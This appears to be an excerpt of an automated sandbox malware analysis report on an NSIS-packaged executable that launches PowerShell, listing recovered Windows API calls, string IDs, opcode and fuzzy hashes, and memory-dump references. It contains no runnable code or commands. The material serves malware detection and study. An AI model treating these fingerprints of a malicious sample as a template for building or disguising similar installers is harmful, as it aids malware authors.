                                                                                                    • Opcode ID: 61b01d759961c4e40bf2e960662e07dc36c2227ae484429a43adcb02bb257662
                                                                                                    • Instruction ID: 148915660003aa48eae5eddbcc28bbe782376451a520f9e519856868b1d6a9df
                                                                                                    • Opcode Fuzzy Hash: 61b01d759961c4e40bf2e960662e07dc36c2227ae484429a43adcb02bb257662
                                                                                                    • Instruction Fuzzy Hash: 8D215771900109BBEF129F90CE89EEE7A7DEF44344F100076FA55B11A0E7B49E54AA68
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                                                    • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                                                    • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                                                    • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                                                    Similarity
                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1849352358-0
                                                                                                    • Opcode ID: 4492c83c4d65da0acc651225de8424e6b85cfb3cdfcda7d846524d3670ad2bdd
                                                                                                    • Instruction ID: ebfb82876bdf2138dcddadba10df032a250d68975ffa4ffa2b6a0506bdc7ea5a
                                                                                                    • Opcode Fuzzy Hash: 4492c83c4d65da0acc651225de8424e6b85cfb3cdfcda7d846524d3670ad2bdd
                                                                                                    • Instruction Fuzzy Hash: 7F212872A00109AFCB05DFA4DD85AAEBBB5FB48300F24407EF905F62A1CB389941DB58
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Timeout
                                                                                                    • String ID: !
                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                    • Opcode ID: db3aae198123fe1a7288e066631643491dd1161a9dd5b8c68cc845e87539b238
                                                                                                    • Instruction ID: 5277f65d77addf964e4e112e3ca2bdcdb488fad455084b9b29b5161e7124752c
                                                                                                    • Opcode Fuzzy Hash: db3aae198123fe1a7288e066631643491dd1161a9dd5b8c68cc845e87539b238
                                                                                                    • Instruction Fuzzy Hash: 4C216071944208BEEB059FB5D98AAAE7FB5EF44304F20847FF502B61D1D6B88540DB28
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
                                                                                                    • wsprintfA.USER32 ref: 00404A47
                                                                                                    • SetDlgItemTextA.USER32(?,0079F568), ref: 00404A5A
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                    • String ID: %u.%u%s%s
                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                    • Opcode ID: ed987abf90c6e27c05c654f7c34a033b58f0c9b6cb29f4e6cc8d7c7430104512
                                                                                                    • Instruction ID: 2d600006130e1353e9717e04d579c0b21937dc8f48943746337f7f8a87e4f386
                                                                                                    • Opcode Fuzzy Hash: ed987abf90c6e27c05c654f7c34a033b58f0c9b6cb29f4e6cc8d7c7430104512
                                                                                                    • Instruction Fuzzy Hash: 5711B7B760412427DB00667D9C45EAF3298DB85378F250237FA66F71D2E978CC2242A9
                                                                                                    APIs
                                                                                                      • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(?,?,007A0970,?,00405B71,007A0970,007A0970,75923410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C
                                                                                                    • lstrlenA.KERNEL32(007A0970,00000000,007A0970,007A0970,75923410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAD
                                                                                                    • GetFileAttributesA.KERNEL32(007A0970,007A0970,007A0970,007A0970,007A0970,007A0970,00000000,007A0970,007A0970,75923410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 00405BBD
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$pz
                                                                                                    • API String ID: 3248276644-1269772899
                                                                                                    • Opcode ID: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
                                                                                                    • Instruction ID: 7cbc09aec6071699a8b6d0bfe618f446c080df756954f9e0a70e7bdf69c0a73f
                                                                                                    • Opcode Fuzzy Hash: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
                                                                                                    • Instruction Fuzzy Hash: A6F0C825105D5516C622623A0C05E9F3A64CE8732871A063FF8A1B12D3DF3CB9439D6E
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A72
                                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A7B
                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405A8C
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A6C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-823278215
• Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
• Instruction ID: 34bed66953ae9f6d257ce18580ddfb03ef3f992d07e6ea95338c5d753b7bd418
• Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
• Instruction Fuzzy Hash: 47D0A7622456307BD20167154C05ECB19088F063047054036F541B2192C73C4C1187FD
APIs
• DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
• GetTickCount.KERNEL32 ref: 00402E6E
• CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
• ShowWindow.USER32(00000000,00000005), ref: 00402E99
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 2c4addb43d5c00204abaef2ddcbdcde683c8282d51b9ea1b9effed1c6012b8ed
• Instruction ID: 07a7c2fcb6e55b04e3e3d34d53389a9772e5beadce82dbb6bf9e24f56b5acc78
• Opcode Fuzzy Hash: 2c4addb43d5c00204abaef2ddcbdcde683c8282d51b9ea1b9effed1c6012b8ed
• Instruction Fuzzy Hash: 91F05E30481624EFC621AB64FE0CA9B7B64BB44B41711893FF085B12F8C77808828BDC
APIs
• IsWindowVisible.USER32(?), ref: 0040519E
• CallWindowProcA.USER32(?,?,?,?), ref: 004051EF
  • Part of subcall function 004041A4: SendMessageA.USER32(0001043E,00000000,00000000,00000000), ref: 004041B6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 34aba529733e3b32ef5863def0a598af0a9d68f7816d72c254ac1b8fca419f55
• Instruction ID: a815c8626c5111ac64f0cf4f46d81bc36f874ce80d1ab61a55fc5c00676d5aef
• Opcode Fuzzy Hash: 34aba529733e3b32ef5863def0a598af0a9d68f7816d72c254ac1b8fca419f55
• Instruction Fuzzy Hash: 1A015E31600608ABEF205F11DD84B9B376AEB84315F244137FA00791D0C7799D62DA69
APIs
• FreeLibrary.KERNEL32(?,75923410,00000000,C:\Users\user\AppData\Local\Temp\,0040382A,00403644,?,?,00000007,00000009,0000000B), ref: 0040386C
• GlobalFree.KERNEL32(00000000), ref: 00403873
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403852
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-823278215
• Opcode ID: bdac3d50bedc405d14197a73e0b52ba201dc392026dc5281ea4620f547822cc0
• Instruction ID: a47bf4f3c2a96a327e4b4819c0cefa3b0cf6e53b08830cce55d404a8342abc97
• Opcode Fuzzy Hash: bdac3d50bedc405d14197a73e0b52ba201dc392026dc5281ea4620f547822cc0
• Instruction Fuzzy Hash: 22E01D3350112057C6616F55EE0475977AD5F49B26F06806BF880773514774AC534FDC
APIs
• lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dP5z8RpEyQ.exe,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00405AB9
• CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dP5z8RpEyQ.exe,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00405AC7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-1246513382
• Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
• Instruction ID: b470c799eb173815a0b66f2a5ec0288490d136ddbfbfb3d8272f9cf217b16711
• Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
• Instruction Fuzzy Hash: C5D0A7635089706FE303A2108C44B9F6A48DF17300F1D4462F081A2191C6784C428BFD
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BFA
• CharNextA.USER32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C0B
• lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
• Instruction ID: c18a7a17a862b3ccaab34bb7c38a9d703f10cc619688c1102a12456a902c3210
• Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
• Instruction Fuzzy Hash: 65F0F631208914FFDB12DFA4DD40D9EBBB8EF56354B2540B9E840FB210D674EE019BA8
Memory Dump Source
• Source File: 00000002.00000002.2622680686.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7e3d3ac3148ac70cc838bdb3eab0c19f6f68e2f5be2798e0630822567b56c7e3
• Instruction ID: 6a50d1bc35fa8820b6d64da311803ffd3c1ad0855686d3b9e880c06b5d2cabf1
• Opcode Fuzzy Hash: 7e3d3ac3148ac70cc838bdb3eab0c19f6f68e2f5be2798e0630822567b56c7e3
• Instruction Fuzzy Hash: 2F528F34B00219CFDB24CF64C9587ADBBB2EF85306F1444AAD84AA7355EB34AD86CF51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2622394643.0000000004E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E1D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_4e1d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93e256b92243bd071c11a764fbed919cd32a3c429e0158e5dba040cf23125bc7
                                                                                                    • Instruction ID: e324d6e98f8e763f7c4b9be2210a5f9356b124595fca693461f38da6ae2182fb
                                                                                                    • Opcode Fuzzy Hash: 93e256b92243bd071c11a764fbed919cd32a3c429e0158e5dba040cf23125bc7
                                                                                                    • Instruction Fuzzy Hash: BB21F475684200DFCF05CF64D9C0B26BF65FB88318F24C5A9E9094A266C33AE456DBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$(ftl$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$x.ek$x.ek$-ek$-ek
                                                                                                    • API String ID: 0-3340470198
                                                                                                    • Opcode ID: a12a951a42646198aeba0267eea3ca6ca5b0e1343401271c53e720d9ebd556b0
                                                                                                    • Instruction ID: b52e974740e766c0f22e4cf5bdd1c94c60ca9e4185181bd05e06561f01d9d3a7
                                                                                                    • Opcode Fuzzy Hash: a12a951a42646198aeba0267eea3ca6ca5b0e1343401271c53e720d9ebd556b0
                                                                                                    • Instruction Fuzzy Hash: A472ADB0B012149FD750CB68C945FAABBB2EF85304F14C1A9E909AF395CB32DD85CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$(ftl$4'jq$4'jq$4'jq$4'jq$4ql$4ql$x.ek$x.ek$-ek
                                                                                                    • API String ID: 0-3862993
                                                                                                    • Opcode ID: 0f49ca474a8da62b6a1a74210f2c8f6d457311611675bdde0b63eb45e7688a50
                                                                                                    • Instruction ID: e05ea82ab1246e9b2a1b1ff47c5aa085d17bfaac7f92d554d46eafec91b7710f
                                                                                                    • Opcode Fuzzy Hash: 0f49ca474a8da62b6a1a74210f2c8f6d457311611675bdde0b63eb45e7688a50
                                                                                                    • Instruction Fuzzy Hash: A7924DB0B002189FD714DB18CD55FAABBB2FB85304F108595D909AB791CB72ED86CFA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$(ftl$4'jq$4'jq$4'jq$4'jq
                                                                                                    • API String ID: 0-918346762
                                                                                                    • Opcode ID: 572504ad43a5f6613247233dfe65bcd8a544795d1ce94793208a480d718e7d2b
                                                                                                    • Instruction ID: d987b2af85299aa9ad740548b0d879e44d0c793b311502400b03172638b260c4
                                                                                                    • Opcode Fuzzy Hash: 572504ad43a5f6613247233dfe65bcd8a544795d1ce94793208a480d718e7d2b
                                                                                                    • Instruction Fuzzy Hash: 04427BB0B41244AFD704CB58C954FAABBB2EF85308F15C468E905AF795CB72ED81CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq
                                                                                                    • API String ID: 0-1582633876
                                                                                                    • Opcode ID: 132b84485422ad10d6ea76c162cb95ac353b441ed6d92431580326ebc6d74487
                                                                                                    • Instruction ID: ea60401438183228ec2497d1e290a37c983b0164bd7191c23f4b3fbb719112ce
                                                                                                    • Opcode Fuzzy Hash: 132b84485422ad10d6ea76c162cb95ac353b441ed6d92431580326ebc6d74487
                                                                                                    • Instruction Fuzzy Hash: 8B32B0B0B462089FD714DB58C954BAABBB2FF85304F15C0A9E9059F791CB72EC81CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$4'jq$4'jq$x.ek$-ek
                                                                                                    • API String ID: 0-2575066576
                                                                                                    • Opcode ID: 1d37bcf65de8a290dd80808005b40bca60342b65dc7ef6fa6b50ecbfac0ca3c7
                                                                                                    • Instruction ID: 57b93963609fe93ea2deaad692cee41c146a9e4585e067652b309764ced79600
                                                                                                    • Opcode Fuzzy Hash: 1d37bcf65de8a290dd80808005b40bca60342b65dc7ef6fa6b50ecbfac0ca3c7
                                                                                                    • Instruction Fuzzy Hash: CDC1B1B0A012449FDB14DF58C944BAEBBB2EF86308F15D469D8016F395CB36ED85CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$4'jq$4ql$x.ek
                                                                                                    • API String ID: 0-2698665739
                                                                                                    • Opcode ID: e8d1ec63325c9c565f047c9ce332fc2fc6cc88bdafffac53ea2be1d2956af993
                                                                                                    • Instruction ID: 6d8c2e05359114f92e3b3e202d85e015a9a7738b1442805b53ccde35e324e8d2
                                                                                                    • Opcode Fuzzy Hash: e8d1ec63325c9c565f047c9ce332fc2fc6cc88bdafffac53ea2be1d2956af993
                                                                                                    • Instruction Fuzzy Hash: C7124BB0A01215DFD720CB18CD55BAABBB2FB85308F10D195D909AB791CB32ED85CFA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ftl$4'jq$4ql$x.ek
                                                                                                    • API String ID: 0-2698665739
                                                                                                    • Opcode ID: 271b9de7533b43222c225b0b1a2be3f7e55b3229ff9ed36713b82ef9aaa31009
                                                                                                    • Instruction ID: ddb8a54c3ea7cd5d52e8e5b00e56b01324a21bba0757e14f9bfea37af5ce754e
                                                                                                    • Opcode Fuzzy Hash: 271b9de7533b43222c225b0b1a2be3f7e55b3229ff9ed36713b82ef9aaa31009
                                                                                                    • Instruction Fuzzy Hash: C2E14AB0A01219DFD720CB14CD95BAABBB2FB85308F10D195D909AB791CB36ED85CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$x.ek$-ek
                                                                                                    • API String ID: 0-637129865
                                                                                                    • Opcode ID: 7b86b74a3bd48774038c6b1d4a03fcd75abad011b2bf4df1b0cf4b20ad3833ce
                                                                                                    • Instruction ID: 21bb4e2c94582c3c1aa3dd79d1351c2db7789d50e47b896d9a5f22f3d66f7c0e
                                                                                                    • Opcode Fuzzy Hash: 7b86b74a3bd48774038c6b1d4a03fcd75abad011b2bf4df1b0cf4b20ad3833ce
                                                                                                    • Instruction Fuzzy Hash: B7527EB47012149FD750CB28C945FAABBB2FB85308F54C1A5E909AB391CB72ED81CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$x.ek$-ek
                                                                                                    • API String ID: 0-637129865
                                                                                                    • Opcode ID: 86780ba126d652acb096f2e2a15278d962fa6f8a4b28ccd02992824ecebd8578
                                                                                                    • Instruction ID: ab1224f213803400eaed61573daa830cc2fb5698c02933b8b202a4c224361bb5
                                                                                                    • Opcode Fuzzy Hash: 86780ba126d652acb096f2e2a15278d962fa6f8a4b28ccd02992824ecebd8578
                                                                                                    • Instruction Fuzzy Hash: C2528CB4A012149FD750CB58C985FAABBB2FB85308F14C1A5E909AF351CB32ED85CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$x.ek$-ek
                                                                                                    • API String ID: 0-637129865
                                                                                                    • Opcode ID: a7dc36af535bf66f5325e74d5e8cb5aeab08d05edabdb0d08ccb6672d9295318
                                                                                                    • Instruction ID: f828beb03ef22e3ef6f0c134a21eb0705818163d9d76f9c660841a1b144d113e
                                                                                                    • Opcode Fuzzy Hash: a7dc36af535bf66f5325e74d5e8cb5aeab08d05edabdb0d08ccb6672d9295318
                                                                                                    • Instruction Fuzzy Hash: 4A424BB07002149FD714DB18CD91FAABBB2FB89704F108595D919AB391CB72ED86CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$h2gk
                                                                                                    • API String ID: 0-1686454285
                                                                                                    • Opcode ID: a6217fc69e5e3c5cf96be6ecd46dbcfc222181a736e3670e34cb4703ae82d508
                                                                                                    • Instruction ID: 3cfeff7806163fbe625336e7993c624c39e22c3b5c12c0267c044c889fa8fbe3
                                                                                                    • Opcode Fuzzy Hash: a6217fc69e5e3c5cf96be6ecd46dbcfc222181a736e3670e34cb4703ae82d508
                                                                                                    • Instruction Fuzzy Hash: 94026CB4B01208AFDB04DB58C954FA9BBB2FF85704F1580A9E9059F791CB72ED81CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $jq$$jq$$jq
                                                                                                    • API String ID: 0-3696375380
                                                                                                    • Opcode ID: 25731bf634913d060d25e5603d18e853377d8e23e1275fc8c16669bee96f8c4b
                                                                                                    • Instruction ID: 2f254a633211f438fd7013c479b30313b11ae1f2163cd0dc0c4b9c8591483ccc
                                                                                                    • Opcode Fuzzy Hash: 25731bf634913d060d25e5603d18e853377d8e23e1275fc8c16669bee96f8c4b
                                                                                                    • Instruction Fuzzy Hash: 264126B2B012269FDB149EAD89442BBF7F6EFC4314B14852AC815EB345DA32DD40C7E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq
                                                                                                    • API String ID: 0-1204115232
                                                                                                    • Opcode ID: 8bea43b5fff1a64a477caf395b8e92719a36ace77164e2ca58f1db37b6f6ee5e
                                                                                                    • Instruction ID: 5aec52d015c0750f9d2b81b5b3fded3959f0feda986ee775d3d2d2695e9e2611
                                                                                                    • Opcode Fuzzy Hash: 8bea43b5fff1a64a477caf395b8e92719a36ace77164e2ca58f1db37b6f6ee5e
                                                                                                    • Instruction Fuzzy Hash: 23125AB4A01245AFE704CF58C984FA9BBB2FF85308F158069E905AF795C772ED81CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq
                                                                                                    • API String ID: 0-1204115232
                                                                                                    • Opcode ID: b84a354a4697f6e61327f3fa1a69bda8971f11e662d4df39e7b41780ab473df8
                                                                                                    • Instruction ID: d1bc498b9832d56ee4c11b9e529e5f22b09f43fc24375f479826eb065d769036
                                                                                                    • Opcode Fuzzy Hash: b84a354a4697f6e61327f3fa1a69bda8971f11e662d4df39e7b41780ab473df8
                                                                                                    • Instruction Fuzzy Hash: AD027CB4A022099FDB14CF58C954FA9BBB2FF88704F15C099E905AB791C772ED81CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq
                                                                                                    • API String ID: 0-1204115232
                                                                                                    • Opcode ID: 01b36434c57bda1f69831020671e054205dd65a99b9866742556a6d07f3fe3d2
                                                                                                    • Instruction ID: 85333f6490ee666abe9fe4a1ca454ebe6fbe3d4cdf9cd13627e61c0546b7f560
                                                                                                    • Opcode Fuzzy Hash: 01b36434c57bda1f69831020671e054205dd65a99b9866742556a6d07f3fe3d2
                                                                                                    • Instruction Fuzzy Hash: 68617BF17092658FC716477C94542AABFA6AFC2214F1880BBD442CF252CA31CD85C7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2634995867.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: x.ek
                                                                                                    • API String ID: 0-2146835383
